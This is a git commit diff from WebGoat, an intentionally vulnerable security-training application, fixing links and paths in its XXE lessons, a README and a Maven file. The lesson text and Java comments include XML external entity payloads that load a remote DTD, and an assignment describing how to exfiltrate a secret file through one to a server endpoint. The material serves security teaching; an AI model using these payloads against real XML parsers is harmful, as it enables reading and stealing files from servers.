Fixing links in several lessons

This commit is contained in:
Nanne Baars 2017-03-23 09:37:53 +01:00
parent 634a4c75b6
commit 98000d6002
8 changed files with 19 additions and 16 deletions

View File

@ -100,7 +100,7 @@ On x86 you can build a container with the following commands:
```Shell ```Shell
cd WebGoat/ cd WebGoat/
mvn package mvn package
cd webgoat-container cd webgoat-server
mvn package mvn package
mvn docker:build mvn docker:build
docker tag webgoat/webgoat-8.0 webgoat/webgoat-8.0:8.0 docker tag webgoat/webgoat-8.0 webgoat/webgoat-8.0:8.0

View File

@ -1 +1 @@
jwt.title=JWT tokens jwt.title=JWT tokens (Under development)

View File

@ -41,7 +41,7 @@ Blind SendFile ...
* <pre> * <pre>
* <?xml version="1.0"?> * <?xml version="1.0"?>
* <!DOCTYPE root [ * <!DOCTYPE root [
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd"> * <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
* %remote; * %remote;
* ]> * ]>
* <user> * <user>

View File

@ -114,7 +114,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
* <pre> * <pre>
* <?xml version="1.0"?> * <?xml version="1.0"?>
* <!DOCTYPE root [ * <!DOCTYPE root [
* <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd"> * <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
* %remote; * %remote;
* ]> * ]>
* <user> * <user>

View File

@ -26,7 +26,7 @@ xxe.simple.output=Welcome {0} you can now login to our website
xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed
xxe.content.output=Welcome {0} you can now login to our website xxe.content.output=Welcome {0} you can now login to our website
xxe.blind.output=Contents of the file is: xxe.blind.output=Contents of the file is: {0}
xxe.hints.simple.xxe.1=Try submitting the form and see what happens xxe.hints.simple.xxe.1=Try submitting the form and see what happens
xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack

View File

@ -4,7 +4,7 @@ In some cases you will see no output because although your attack might have wor
Or the resource you are trying to read contains illegal XML character which causes the parser to fail. Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
Let's start with an example, in this case we reference a external DTD which we control on our own server. Let's start with an example, in this case we reference a external DTD which we control on our own server.
Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.* Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
[source] [source]
---- ----
@ -33,7 +33,7 @@ Now submit the form and change the xml to:
---- ----
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE root [ <!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd"> <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/attack.dtd">
%remote; %remote;
]> ]>
<user> <user>
@ -51,5 +51,5 @@ GET Java/1.8.0_101 HelloWorld
So with the XXE we are able to ping our own server which means XXE injection is possible. So with the XXE we are able to ping our own server which means XXE injection is possible.
[NOTE] [NOTE]
In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
of course be a host fully under the attackers control. of course be a host fully under the attackers control.

View File

@ -1,7 +1,10 @@
== Blind XXE assignment == Blind XXE assignment
In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
this would be `c:/Users/USER/.webgoat/XXE/secret.txt` For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control) Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
You can login to the Docker container as follows: `docker exec -i -t <<name>> /bin/bash`

View File

@ -86,11 +86,11 @@
<artifactId>webgoat-container</artifactId> <artifactId>webgoat-container</artifactId>
<version>${project.version}</version> <version>${project.version}</version>
</dependency> </dependency>
<dependency> <!--<dependency>-->
<groupId>org.owasp.webgoat.lesson</groupId> <!--<groupId>org.owasp.webgoat.lesson</groupId>-->
<artifactId>challenge</artifactId> <!--<artifactId>challenge</artifactId>-->
<version>${project.version}</version> <!--<version>${project.version}</version>-->
</dependency> <!--</dependency>-->
<dependency> <dependency>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>client-side-filtering</artifactId> <artifactId>client-side-filtering</artifactId>